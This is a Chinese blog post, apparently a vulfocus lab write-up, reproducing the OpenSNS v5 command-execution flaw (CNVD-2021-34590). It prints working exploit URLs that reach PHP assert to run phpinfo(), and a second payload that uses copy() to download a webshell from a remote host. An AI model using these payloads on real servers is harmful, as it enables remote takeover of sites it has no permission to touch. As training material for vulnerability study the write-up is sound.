vulfocus——opensns命令执行(CNVD-2021-34590)

最新推荐文章于 2023-12-01 09:44:11 发布
最新推荐文章于 2023-12-01 09:44:11 发布
阅读量740 收藏 2
点赞数
分类专栏: vulfocus复现 文章标签: servlet jar java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62063669/article/details/127111301
版权
本文详细介绍了OpenSNS系统中存在的命令执行漏洞,攻击者可通过发送特定请求执行任意命令,从而获取服务器控制权限。复现过程包括:1. 打开靶场;2. 发送请求包;3. 查找phpinfo中的flag;4. 使用copy函数下载webshell。此漏洞利用了系统函数的弱点,实现了远程代码执行。
摘要由CSDN通过智能技术生成

描述

OpenSNS存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权限。 

复现

1.打开靶场

2.发送特定请求包可以执行任意命令

/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=phpinfo() 

3.在phpinfo找到flag

4.也可以通过下载webshell,用工具连接

此处的cmd= 只能传参1个,在使用'system'函数空格会导致执行失败,故而使用php中的copy函数直接下载webshell实现RCE。

/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=copy(%27http://xxx/a.txt%27,%27a.php%27)

 copy(远程文件下载地址,需要下载到的地方) 

隐身的菜鸟
关注
专栏目录
漏洞复现 || OpenSNS远程命令执行漏洞
失心少年
07-12 748
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。本文所提供的工具仅用于学习,禁止用于其他!opensns是基于tp3开发的,仅支持php5,漏洞入口在 weibo/share/sharebox,通过 get请求提交query参数,存在变量覆盖的漏洞,攻击者通过漏洞发送特定的请求包可以执行任意命令。1.执行如下POC可执行远程命令
OpenSNS命令执行(CNVD-2021-34590)
最新发布
m0_65150886的博客
01-22 566
OpenSNS是想天科技开发的一款综合性社交软件。用户可以使用OpenSNS快速搭建一个类似于新浪微博一样的功能强大的社交网站。用户的社交网站也可以在微信中被访问,还支持苹果和安卓手机通过APP的形式使用。除此之外,OpenSNS还提供云市场进行功能扩展。OpenSNS v5存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权限。1.访问http://ip:port,出现如下页面,开始实验。2.构造payload,访问phpinfo。
Opensns 命令执行漏洞(CNVD-2021-34590)
小小猪的博客
12-29 3698
Opensns 命令执行漏洞(CNVD-2021-34590) 漏洞描述: OpenSNS 存在远程命令执行漏洞,攻击者通过漏洞发送特定的请求包可以执行任意命令 影响版本: OpenSNS v5 环境搭建: 在线环境 地址 访问首页 构造poc /index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[m.
OpenSNS 远程执行任意命令漏洞
未花的博客
12-01 433
status必须等于1,值里必须要app、model、method
Vulfocus之tomcat系列题目获取flag攻略
weixin_45130489的博客
09-19 2131
快速通关靶场,3个tomcat漏洞的题目。
vulfocus复现:nginx-php-flag
m0_71518346的博客
12-18 285
命令执行(Command Execution)漏洞即黑客可以直接在Web应用中执行系统命令,从而获取敏感信息或者拿下shell权限。命令执行漏洞可能造成的原因是Web服务器对用户输入命令安全检测不足,导致恶意代码被执行
OpenSNS开源社交系统 v5.7.0
10-14
OpenSNS一款有身份的开源SNS社交系统,包含 微博、资讯、活动、论坛、专辑、积分商城、群组、充值中心、 问答、分类信息、微店等模块,支持PC端、手机网页版、客户端、 微信版
OpenSNS-2.6.0安装教程及完整PHP源码下载.txt
07-17
OpenSNS是php语言的开源社交源码系统,用户交互界面简洁大方,包含功能有微博、论坛、积分商城、群组、充值中心、分类信息、微店等,可以快速搭建社交类网址。
OpenSNS-a5
11-08
OpenSNS的源码开放,意味着用户可以根据自己的需求对系统进行深度定制,从而满足个性化的需求。 首先,OpenSNS的源码下载后可以直接安装使用,这大大简化了部署过程。用户只需要按照官方提供的文档指导,配置好...
OpenSNS微社区 6.0.0.zip
05-27
OpenSNS微社区是一款综合性社交软件,您可以使用OpenSNS快速搭建一个类似新浪微博一样的功能强大的社交网站,您的社交网站也可以在微信中被访问,还支持苹果和安卓手机通过APP的形式使用,除此之外,OpenSNS还提供云...
1Day - opensns审计 -后半部分poc补充
weixin_40418457的博客
07-09 146
一、前话: 由于本周也是在补天公众号看到了(moonv)师傅的代码审计文章 想着复现下无奈只有前部分的poc而已,剩下的只能自己补上了 可能会存在点理解误差。(师傅们轻点喷,本人新手文章,耗时一天) 二、审计工具: PhpStudy(2016版本)、Phpstorm(2020.3.2版本) 三、审计步骤: 由于是thinkphp框架写的,是(应用/控制器/方法名)进行访问的, 访问这控制器是 ?s=Weibo/Share/shareBox&query= 往下走就是到17行②处,这里将query解码
VULFOCUS靶场CVE-2020-5504漏洞复现拿flag
u013345705的博客
07-18 2743
VULFOCUS CVE-2020-5504
OpenSIPS脚本中的flag
至虛極,守靜篤
01-25 598
OpenSIPS脚本中的flag分类,使用。
[Vulfocus解题系列] struts2-046 远程代码执行 (CVE-2017-5638)
00勇士王子的博客
07-12 1228
漏洞介绍 名称: struts2-046 远程代码执行 (CVE-2017-5638) 描述: Apache Struts是美国阿帕奇(Apache)软件基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。 攻击者可以将恶意代码放入http报文头部的Content-Disposition的filename字段,通 过不恰当的filename字段或者大小超过2G的Content-Length字段来触发异常,进而导致任意代
opensns 命令执行CNVD-2021-34590)漏洞复现
weixin_42675091的博客
09-23 1402
opensns 命令执行CNVD-2021-34590)漏洞复现
vulfocus-struts2 命令执行 (CVE-2016-3081)
Fanny0602的博客
06-16 1960
vulfocus靶场:struts2 命令执行 (CVE-2016-3081)。
vulfocus】tomcat文件上传 (CVE-2017-12615)
RexHa的博客
10-17 1654
vulfocus靶场 tomcat-文件上传 名称: vulfocus/tomcat-cve_2017_12615:latest
[漏洞复现]vulfocus/jenkins-cve_2017_1000353
qq_45751902的博客
11-24 565
Jenkins的反序列化漏洞,攻击者使用该漏洞可以在被攻击服务器执行任意代码,漏洞利用不需要任何的权限建议自己搭建环境复现,这个vulfocus上没有体现出反序列化漏洞,因为无法使用反序列化查看flag,最终使用弱口令登录,执行系统命令成功找到flag。
靶场实战之pWnOS:2.0
qq_55415442的博客
07-14 176
靶场实战之pWnOS2.0
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值